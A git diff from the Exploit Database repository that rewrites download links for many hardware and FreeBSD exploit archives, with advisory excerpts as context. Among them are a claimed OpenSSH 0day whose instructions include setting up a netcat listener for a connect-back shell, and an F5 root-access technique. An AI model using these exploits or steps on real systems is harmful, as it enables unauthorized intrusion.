-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40274.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40274.zip \ No newline at end of file diff --git a/exploits/freebsd/local/12090.txt b/exploits/freebsd/local/12090.txt index a3648e0f7..274c080d3 100644 --- a/exploits/freebsd/local/12090.txt +++ b/exploits/freebsd/local/12090.txt @@ -15,4 +15,4 @@ Ironmail was found to allow any CLI user to run arbitrary commands with Admin ri improper handling of environment variables. Download: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/12090.pdf (cybsec_advisory_2010_0404.pdf) \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/12090.pdf (cybsec_advisory_2010_0404.pdf) \ No newline at end of file diff --git a/exploits/freebsd/local/12091.txt b/exploits/freebsd/local/12091.txt index 97a039868..c09460bfd 100644 --- a/exploits/freebsd/local/12091.txt +++ b/exploits/freebsd/local/12091.txt @@ -14,4 +14,4 @@ Vulnerability Description: Some files that allow to obtain usernames and other internal information can be read by any user inside the CLI. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/12091.pdf (cybsec_advisory_2010_0403.pdf) \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/12091.pdf (cybsec_advisory_2010_0403.pdf) \ No newline at end of file diff --git a/exploits/freebsd/remote/17462.txt b/exploits/freebsd/remote/17462.txt index 64ff28c40..e3c3452e0 100644 --- a/exploits/freebsd/remote/17462.txt +++ b/exploits/freebsd/remote/17462.txt @@ -196,7 +196,7 @@ Kingcope A statically linked linux binary of the exploit can be found below attached is a diff to openssh-5.8p2. the statically linked binary can be downloaded from http://isowarez.de/ssh_0day -Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/17462.tar.gz (ssh_0day.tar.gz) +Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17462.tar.gz (ssh_0day.tar.gz) run like ./ssh -1 -z setup a netcat, port 443 on yourip first \ No newline at end of file diff --git a/exploits/freebsd/remote/18181.txt b/exploits/freebsd/remote/18181.txt index d9521a2fd..80e77bbaa 100644 --- a/exploits/freebsd/remote/18181.txt +++ b/exploits/freebsd/remote/18181.txt @@ -33,4 +33,4 @@ BTW my box (isowarez.de) got hacked so expect me in a zine :> /Signed "the awesome" Kingcope Code: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18181.tar (7350roaringbeastv3.tar) \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18181.tar (7350roaringbeastv3.tar) \ No newline at end of file diff --git a/exploits/freebsd/remote/20593.txt b/exploits/freebsd/remote/20593.txt index b081f4245..c1077c1a0 100644 --- a/exploits/freebsd/remote/20593.txt +++ b/exploits/freebsd/remote/20593.txt @@ -8,4 +8,4 @@ It is possible for packets that are not part of an established connection to be Exploitation of this vulnerability may allow for unauthorized remote access to otherwise protected services. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/20593.tgz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20593.tgz \ No newline at end of file diff --git a/exploits/freebsd/webapps/12658.txt b/exploits/freebsd/webapps/12658.txt index 661051eaf..12031c6eb 100644 --- a/exploits/freebsd/webapps/12658.txt +++ b/exploits/freebsd/webapps/12658.txt @@ -15,4 +15,4 @@ improper profile check. =========== Download: =========== -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/12658.pdf (cybsec_advisory_2010_0501_Ironmail_Advisory_Web_Access_Broken_Access.pdf) \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/12658.pdf (cybsec_advisory_2010_0501_Ironmail_Advisory_Web_Access_Broken_Access.pdf) \ No newline at end of file diff --git a/exploits/hardware/dos/11043.txt b/exploits/hardware/dos/11043.txt index 0d1a89634..5e4d6f5a9 100644 --- a/exploits/hardware/dos/11043.txt +++ b/exploits/hardware/dos/11043.txt @@ -36,4 +36,4 @@ Email : f3arm3d3ar@gmail.com =============== Download =============== -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/11043.rar (Sony_Ericsson.rar) \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11043.rar (Sony_Ericsson.rar) \ No newline at end of file diff --git a/exploits/hardware/dos/12093.txt b/exploits/hardware/dos/12093.txt index 554d125f8..6b3f51ded 100644 --- a/exploits/hardware/dos/12093.txt +++ b/exploits/hardware/dos/12093.txt @@ -15,4 +15,4 @@ Users inside the CLI can run some kind of “Fork Bomb” in order to saturate s of an insecure ulimit value. Download: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/12093.pdf (cybsec_advisory_2010_0401.pdf) \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/12093.pdf (cybsec_advisory_2010_0401.pdf) \ No newline at end of file diff --git a/exploits/hardware/dos/13823.txt b/exploits/hardware/dos/13823.txt index 38093a303..6d6d7ffe5 100644 --- a/exploits/hardware/dos/13823.txt +++ b/exploits/hardware/dos/13823.txt @@ -1,3 +1,3 @@ I wrote a fuzzer "dumb fuzzer" and used a sample from http://www.ccp14.ac.uk/ccp/web-mirrors/bca-spreadsheets/scanplot101.xls which I randomly found on the internet. I mutated the data and tested roughly 1000 cases on several Document Reader Applications for iPhone. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/13823.xls (savysoda_poc.xls) \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/13823.xls (savysoda_poc.xls) \ No newline at end of file diff --git a/exploits/hardware/dos/13824.txt b/exploits/hardware/dos/13824.txt index 65647a151..bd905a1bd 100644 --- a/exploits/hardware/dos/13824.txt +++ b/exploits/hardware/dos/13824.txt @@ -1,3 +1,3 @@ I wrote a fuzzer "dumb fuzzer" and used a sample from http://www.ccp14.ac.uk/ccp/web-mirrors/bca-spreadsheets/scanplot101.xls which I randomly found on the internet. I mutated the data and tested roughly 1000 cases on several Document Reader Applications for iPhone. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/13824.xls (office2_poc.xls) \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/13824.xls (office2_poc.xls) \ No newline at end of file diff --git a/exploits/hardware/dos/13825.txt b/exploits/hardware/dos/13825.txt index f513e1237..654fcfc55 100644 --- a/exploits/hardware/dos/13825.txt +++ b/exploits/hardware/dos/13825.txt @@ -1,3 +1,3 @@ I wrote a fuzzer "dumb fuzzer" and used a sample from http://www.ccp14.ac.uk/ccp/web-mirrors/bca-spreadsheets/scanplot101.xls which I randomly found on the internet. I mutated the data and tested roughly 1000 cases on several Document Reader Applications for iPhone. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/13825.xls (goodreader_poc.xls) \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/13825.xls (goodreader_poc.xls) \ No newline at end of file diff --git a/exploits/hardware/dos/18751.txt b/exploits/hardware/dos/18751.txt index 9f6f94dfe..ab4de2114 100644 --- a/exploits/hardware/dos/18751.txt +++ b/exploits/hardware/dos/18751.txt @@ -130,7 +130,7 @@ other bugs and understanding them :) http://aluigi.org/poc/samsux_1.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18751.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18751.zip ####################################################################### diff --git a/exploits/hardware/dos/20821.txt b/exploits/hardware/dos/20821.txt index 98465237a..6f871c794 100644 --- a/exploits/hardware/dos/20821.txt +++ b/exploits/hardware/dos/20821.txt @@ -6,4 +6,4 @@ A problem in the Cisco Hot Standby Routing Protocol (HSRP) makes it possible to This problem makes it possible for system local to the network to deny service to legitmate users of that network segment. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/20821.tgz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20821.tgz \ No newline at end of file diff --git a/exploits/hardware/dos/20824.txt b/exploits/hardware/dos/20824.txt index afd186668..a02885483 100644 --- a/exploits/hardware/dos/20824.txt +++ b/exploits/hardware/dos/20824.txt @@ -6,4 +6,4 @@ A problem with the switch firmware could allow a Denial of Service to legitimate This problem makes it possible for a remote user to deny service to legitimate users of the switch. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/20824.tgz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20824.tgz \ No newline at end of file diff --git a/exploits/hardware/dos/21092.txt b/exploits/hardware/dos/21092.txt index 856b3c9d8..74caa4435 100644 --- a/exploits/hardware/dos/21092.txt +++ b/exploits/hardware/dos/21092.txt @@ -7,4 +7,4 @@ CBOS becomes unstable when it receives multiple TCP connections on one of the tw This problem affects the following Cisco 600 series routers: 627, 633, 673, 675, 675E, 677, 677i and 678. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/21092.mrc \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21092.mrc \ No newline at end of file diff --git a/exploits/hardware/dos/22596.txt b/exploits/hardware/dos/22596.txt index 18d37b42c..2bc587c32 100644 --- a/exploits/hardware/dos/22596.txt +++ b/exploits/hardware/dos/22596.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7575/info It has been reported that a problem with Verilink broadband routers exists in the handling of TFTP packets. Because of this, an attacker could potentially deny service to legitimate users of the network. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/22596.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22596.zip \ No newline at end of file diff --git a/exploits/hardware/dos/22978.txt b/exploits/hardware/dos/22978.txt index 85747bd26..6f49ab339 100644 --- a/exploits/hardware/dos/22978.txt +++ b/exploits/hardware/dos/22978.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/8323/info It has been reported that under some circumstances, a Cisco appliance running IOS may answer malicious malformed UDP echo packets with replies that contain partial contents from the affected router's memory. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/22978.tgz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22978.tgz \ No newline at end of file diff --git a/exploits/hardware/dos/23876.txt b/exploits/hardware/dos/23876.txt index 06dbc324e..94e9f81fa 100644 --- a/exploits/hardware/dos/23876.txt +++ b/exploits/hardware/dos/23876.txt @@ -4,4 +4,4 @@ It has been reported that Picophone is prone to a remote buffer overflow vulnera Successful exploitation of this issue will cause a denial of service condition to be triggered. The attacker may also leverage this issue to execute arbitrary code; this code would be executed in the security context of the user running the affected process. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23876.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23876.zip \ No newline at end of file diff --git a/exploits/hardware/dos/23900.txt b/exploits/hardware/dos/23900.txt index 249ff0401..d042f8fd0 100644 --- a/exploits/hardware/dos/23900.txt +++ b/exploits/hardware/dos/23900.txt @@ -6,4 +6,4 @@ If an attacker is able to overwrite sensitive memory locations, it may be possib All versions of cdp are assumed to be vulnerable to this issue. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23900.tgz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23900.tgz \ No newline at end of file diff --git a/exploits/hardware/dos/28228.txt b/exploits/hardware/dos/28228.txt index e1b77ca3d..b8f921dd3 100644 --- a/exploits/hardware/dos/28228.txt +++ b/exploits/hardware/dos/28228.txt @@ -6,4 +6,4 @@ Exploitation of this vulnerability could cause the firewall application to crash The individual who discovered this vulnerability claims to have tested it on Sunbelt Kerio Personal Firewall versions 4.3.246 and 4.2.3.912. They were unable to reproduce the vulnerability on version 4.2.3.912, which is an older release. The vulnerable functionality may have been introduced at some point after the 4.2.3.912 release, but this has not been confirmed. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/28228.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28228.zip \ No newline at end of file diff --git a/exploits/hardware/dos/41806.txt b/exploits/hardware/dos/41806.txt index 34dcd93b9..7a09c9155 100644 --- a/exploits/hardware/dos/41806.txt +++ b/exploits/hardware/dos/41806.txt @@ -72,4 +72,4 @@ I've been able to verify this vulnerability on the BCM4339 chip, running version Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41806.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41806.zip \ No newline at end of file diff --git a/exploits/hardware/dos/43490.txt b/exploits/hardware/dos/43490.txt index 667812ade..5aa34c0b6 100644 --- a/exploits/hardware/dos/43490.txt +++ b/exploits/hardware/dos/43490.txt @@ -143,4 +143,4 @@ flushing would be necessary to make it work. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43490.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43490.zip \ No newline at end of file diff --git a/exploits/hardware/dos/44197.md b/exploits/hardware/dos/44197.md index e72e6b53a..1da60b518 100644 --- a/exploits/hardware/dos/44197.md +++ b/exploits/hardware/dos/44197.md @@ -25,4 +25,4 @@ License MIT License. See attached `LICENSE.md` file. -Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44197.zip \ No newline at end of file +Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44197.zip \ No newline at end of file diff --git a/exploits/hardware/dos/8013.txt b/exploits/hardware/dos/8013.txt index cb60064da..fef279ca4 100644 --- a/exploits/hardware/dos/8013.txt +++ b/exploits/hardware/dos/8013.txt @@ -27,7 +27,7 @@ POC/EXPLOIT you can open this url with the browser or send mms with this image. http://es.geocities.com/jplopezy/nokiacrash.jpg -alt: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/8013.jpg (2009-nokiacrash.jpg) +alt: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8013.jpg (2009-nokiacrash.jpg) ------------------------------------------------------ Juan Pablo Lopez Yacubian diff --git a/exploits/hardware/local/21001.txt b/exploits/hardware/local/21001.txt index 4474ac0d4..f9923c657 100644 --- a/exploits/hardware/local/21001.txt +++ b/exploits/hardware/local/21001.txt @@ -8,4 +8,4 @@ These files are created in /tmp with a guessable naming format, making it trivia Since user-supplied data is written to the target file, attackers may be able to elevate privileges. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/21001.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21001.tar.gz \ No newline at end of file diff --git a/exploits/hardware/local/40271.txt b/exploits/hardware/local/40271.txt index b9990ec53..45aa95e6c 100644 --- a/exploits/hardware/local/40271.txt +++ b/exploits/hardware/local/40271.txt @@ -5,4 +5,4 @@ Full Exploit: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40271.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40271.zip \ No newline at end of file diff --git a/exploits/hardware/local/43397.md b/exploits/hardware/local/43397.md index c1fd66608..b3422b489 100644 --- a/exploits/hardware/local/43397.md +++ b/exploits/hardware/local/43397.md @@ -29,4 +29,4 @@ I was not alone in this exploit's development, and would like to thank those who - Anonymous -E-DB Note: Download ~ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43397.zip \ No newline at end of file +E-DB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43397.zip \ No newline at end of file diff --git a/exploits/hardware/local/44198.md b/exploits/hardware/local/44198.md index ec9cf9d8c..270be9ce3 100644 --- a/exploits/hardware/local/44198.md +++ b/exploits/hardware/local/44198.md @@ -26,4 +26,4 @@ Credits ============== qwertyoruiopz - The original exploit, the likes of which can be found [here](http://rce.party/ps4/). -Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44198.zip \ No newline at end of file +Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44198.zip \ No newline at end of file diff --git a/exploits/hardware/local/44200.md b/exploits/hardware/local/44200.md index 14f0f2919..e76dd8cd5 100644 --- a/exploits/hardware/local/44200.md +++ b/exploits/hardware/local/44200.md @@ -18,4 +18,4 @@ Liang Chen thexyz dreadlyei -Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44200.zip \ No newline at end of file +Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44200.zip \ No newline at end of file diff --git a/exploits/hardware/local/44206.c b/exploits/hardware/local/44206.c index 66aeae8e4..2b621508d 100644 --- a/exploits/hardware/local/44206.c +++ b/exploits/hardware/local/44206.c @@ -6,7 +6,7 @@ - @kr105rlz -Download: http://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44206.zip +Download: http://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44206.zip */ #include "ps4.h" diff --git a/exploits/hardware/local/44644.txt b/exploits/hardware/local/44644.txt index 151fee093..3071f6edd 100644 --- a/exploits/hardware/local/44644.txt +++ b/exploits/hardware/local/44644.txt @@ -17,4 +17,4 @@ It is desired to find a way to invoke edge engine when console is offline Greets from unknownv2 & mon0 _ -Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44644.zip \ No newline at end of file +Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44644.zip \ No newline at end of file diff --git a/exploits/hardware/local/44818.md b/exploits/hardware/local/44818.md index 084a04e57..d1feb1ee9 100644 --- a/exploits/hardware/local/44818.md +++ b/exploits/hardware/local/44818.md @@ -5,7 +5,7 @@ In this project you will find a full implementation of the second "bpf" kernel e This bug was discovered by qwertyoruiopz, and can be found hosted on his website [here](http://crack.bargains/505k/). The [GitHub Pages site](https://cryptogenic.github.io/PS4-5.05-Kernel-Exploit/) automatically generated from this repository should also work. -Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44818.zip +Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44818.zip ## Patches Included The following patches are made by default in the kernel ROP chain: diff --git a/exploits/hardware/local/44820.txt b/exploits/hardware/local/44820.txt index 284e06f7c..d9ec24be9 100644 --- a/exploits/hardware/local/44820.txt +++ b/exploits/hardware/local/44820.txt @@ -1,5 +1,5 @@ EDB Note ~ http://ps3xploit.com/help/dumper.html -EDB Download ~ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44820.zip +EDB Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44820.zip ## Dumper Help diff --git a/exploits/hardware/remote/12298.txt b/exploits/hardware/remote/12298.txt index 892e063d9..91c704b79 100644 --- a/exploits/hardware/remote/12298.txt +++ b/exploits/hardware/remote/12298.txt @@ -9,7 +9,7 @@ # V100R001B121Telmex # Exploit Download Link: # http://www.hakim.ws/huawei/HG520_udpinfo.tar.gz -# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/12298.tar.gz (HG520_udpinfo.tar.gz) +# https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/12298.tar.gz (HG520_udpinfo.tar.gz) By sending a specially crafted UDP packet you can remotely obtain the diff --git a/exploits/hardware/remote/18291.txt b/exploits/hardware/remote/18291.txt index f52fab7b3..f544ad449 100644 --- a/exploits/hardware/remote/18291.txt +++ b/exploits/hardware/remote/18291.txt @@ -7,4 +7,4 @@ # Tested on: Access points from Linksys, Cisco, D-Link, TP-Link, Trendnet, and others # CVE : No CVE US-CERT VU#723755 -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18291.tar.gz (reaver-1.1.tar.gz) \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18291.tar.gz (reaver-1.1.tar.gz) \ No newline at end of file diff --git a/exploits/hardware/remote/19538.txt b/exploits/hardware/remote/19538.txt index 05c876a94..39edf60ef 100644 --- a/exploits/hardware/remote/19538.txt +++ b/exploits/hardware/remote/19538.txt @@ -2,6 +2,6 @@ source: http://www.securityfocus.com/bid/695/info Hybrid Network's cable modems are vulnerable to several different types of attack due to a lack of authentication for the remote administration/configuration system. The cable modems use a protocol called HSMP, which uses UDP as its transport layer protocol. This makes it trivial to spoof packets and possible for hackers to compromise cable-modem subscribers anonymously. The possible consequences of this problem being exploited are very serious and range from denial of service attacks to running arbitrary code on the modem. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19538-1.tar.gz -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19538-2.tar.gz -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19538-3.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19538-1.tar.gz +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19538-2.tar.gz +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19538-3.tar.gz \ No newline at end of file diff --git a/exploits/hardware/remote/2034.txt b/exploits/hardware/remote/2034.txt index 2f3a01218..6e7d96a13 100644 --- a/exploits/hardware/remote/2034.txt +++ b/exploits/hardware/remote/2034.txt @@ -1,5 +1,5 @@ BT Voyager 2091 (Wireless ADSL) Multiple Vulnerabilities -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/2034.tgz (07182006-btvoyager.tgz) +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/2034.tgz (07182006-btvoyager.tgz) # milw0rm.com [2006-07-18] \ No newline at end of file diff --git a/exploits/hardware/remote/22532.txt b/exploits/hardware/remote/22532.txt index a7fec892b..1746fcaa6 100644 --- a/exploits/hardware/remote/22532.txt +++ b/exploits/hardware/remote/22532.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7423/info When a VPN is configured to use a pre-shared master secret and a client attempts to negotiate keys in aggressive mode, a hash of the secret is transmitted across the network in clear-text. This may result in the hash being leaked to eavesdroppers or malicious clients. An offline brute-force attack on this hash may then be performed to obtain the clear-text secret. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/22532.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22532.tar.gz \ No newline at end of file diff --git a/exploits/hardware/remote/23212.txt b/exploits/hardware/remote/23212.txt index 5db86eb94..23369c213 100644 --- a/exploits/hardware/remote/23212.txt +++ b/exploits/hardware/remote/23212.txt @@ -5,4 +5,4 @@ Authentication Protocol) is prone to a password disclosure weakness that may all Successful exploitation of this weakness may allow a remote attacker to steal authentication information, potentially allowing for unauthorized network access. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23212.tar.bz2 \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23212.tar.bz2 \ No newline at end of file diff --git a/exploits/hardware/remote/28056.txt b/exploits/hardware/remote/28056.txt index a76620b38..2c27ab406 100644 --- a/exploits/hardware/remote/28056.txt +++ b/exploits/hardware/remote/28056.txt @@ -13,4 +13,4 @@ Shodanhq.com shows >290.000 entries for the ROSSSH search term. The 50 megs Mikrotik package including the all research items can be downloaded here: http://www.farlight.org/mikropackage.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/28056.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28056.zip \ No newline at end of file diff --git a/exploits/hardware/remote/31132.txt b/exploits/hardware/remote/31132.txt index 5a530e411..1dc0e3d7f 100644 --- a/exploits/hardware/remote/31132.txt +++ b/exploits/hardware/remote/31132.txt @@ -6,4 +6,4 @@ Attackers can exploit these issues to cause denial-of-service conditions or to o These issues affect versions prior to ExtremeZ-IP File Server 5.1.2x15 and ExtremeZ-IP Print Server 5.1.2x15. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31132.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31132.zip \ No newline at end of file diff --git a/exploits/hardware/remote/33869.txt b/exploits/hardware/remote/33869.txt index 54371dbed..c8e84b4e6 100644 --- a/exploits/hardware/remote/33869.txt +++ b/exploits/hardware/remote/33869.txt @@ -8,4 +8,4 @@ The following Huawei EchoLife HG520 firmware and software versions are vulnerabl Firmware 3.10.18.7-1.0.7.0, 3.10.18.5-1.0.7.0, 3.10.18.4 Software Versions: V100R001B120Telmex, V100R001B121Telmex -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33869.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33869.tar.gz \ No newline at end of file diff --git a/exploits/hardware/remote/34465.txt b/exploits/hardware/remote/34465.txt index 108e11ed0..0cd056be9 100644 --- a/exploits/hardware/remote/34465.txt +++ b/exploits/hardware/remote/34465.txt @@ -1,4 +1,4 @@ When configured in a high availability mode, the F5 solution suffers from an unauthenticated rsync access vulnerability that can be leveraged to upload a malicious SSH key and gain remote root access to the appliance. The BigIP platform configures an rsync daemon listening on the ConfigSync interfaces when the system is configured in a failover mode. The rsync daemon as currently configured does not require any authentication and the “cmi” module has complete read/write access to the system. If the ConfigSync IP addresses are accessible by a malicious third party, it is possible to upload an authorized_keys file directly into the /var/ssh/root directory and then open a root SSH session on the f5 device. -Advisory: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34465.pdf \ No newline at end of file +Advisory: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34465.pdf \ No newline at end of file diff --git a/exploits/hardware/remote/40258.txt b/exploits/hardware/remote/40258.txt index b420c4250..cc5c3615a 100644 --- a/exploits/hardware/remote/40258.txt +++ b/exploits/hardware/remote/40258.txt @@ -14,4 +14,4 @@ Requirements: Full Exploit: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40258.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40258.zip \ No newline at end of file diff --git a/exploits/hardware/remote/40275.txt b/exploits/hardware/remote/40275.txt index c2c67d6c3..ec3329ac7 100644 --- a/exploits/hardware/remote/40275.txt +++ b/exploits/hardware/remote/40275.txt @@ -5,4 +5,4 @@ Full Exploit: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40275.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40275.zip \ No newline at end of file diff --git a/exploits/hardware/remote/41298.txt b/exploits/hardware/remote/41298.txt index 1320d82fe..a90107782 100644 --- a/exploits/hardware/remote/41298.txt +++ b/exploits/hardware/remote/41298.txt @@ -115,4 +115,4 @@ OPTIONS: -h, --help Print this message ` -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41298.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41298.zip \ No newline at end of file diff --git a/exploits/hardware/remote/41805.txt b/exploits/hardware/remote/41805.txt index ce7651c51..98ec11399 100644 --- a/exploits/hardware/remote/41805.txt +++ b/exploits/hardware/remote/41805.txt @@ -130,4 +130,4 @@ BCMPatcher.tar.gz Proofs of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41805.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41805.zip \ No newline at end of file diff --git a/exploits/hardware/remote/41808.txt b/exploits/hardware/remote/41808.txt index d0fcc76d7..588756d5e 100644 --- a/exploits/hardware/remote/41808.txt +++ b/exploits/hardware/remote/41808.txt @@ -57,4 +57,4 @@ This exploit uses scapy-fakeap to broadcast a dummy network. The exploit starts Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41808.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41808.zip \ No newline at end of file diff --git a/exploits/hardware/remote/44196.md b/exploits/hardware/remote/44196.md index 64bf54c86..610dfdc07 100644 --- a/exploits/hardware/remote/44196.md +++ b/exploits/hardware/remote/44196.md @@ -27,4 +27,4 @@ Massive credits to the following: - [Flatz](https://twitter.com/flat_z) - Anonymous -Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44196-v2.zip \ No newline at end of file +Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44196-v2.zip \ No newline at end of file diff --git a/exploits/hardware/remote/44574.txt b/exploits/hardware/remote/44574.txt index 983e53332..dd0386911 100644 --- a/exploits/hardware/remote/44574.txt +++ b/exploits/hardware/remote/44574.txt @@ -32,4 +32,4 @@ functions properly. $ ssh root@norton.core ``` -Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44574.zip \ No newline at end of file +Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44574.zip \ No newline at end of file diff --git a/exploits/hardware/remote/8269.txt b/exploits/hardware/remote/8269.txt index ef6665df8..a9bc94e30 100644 --- 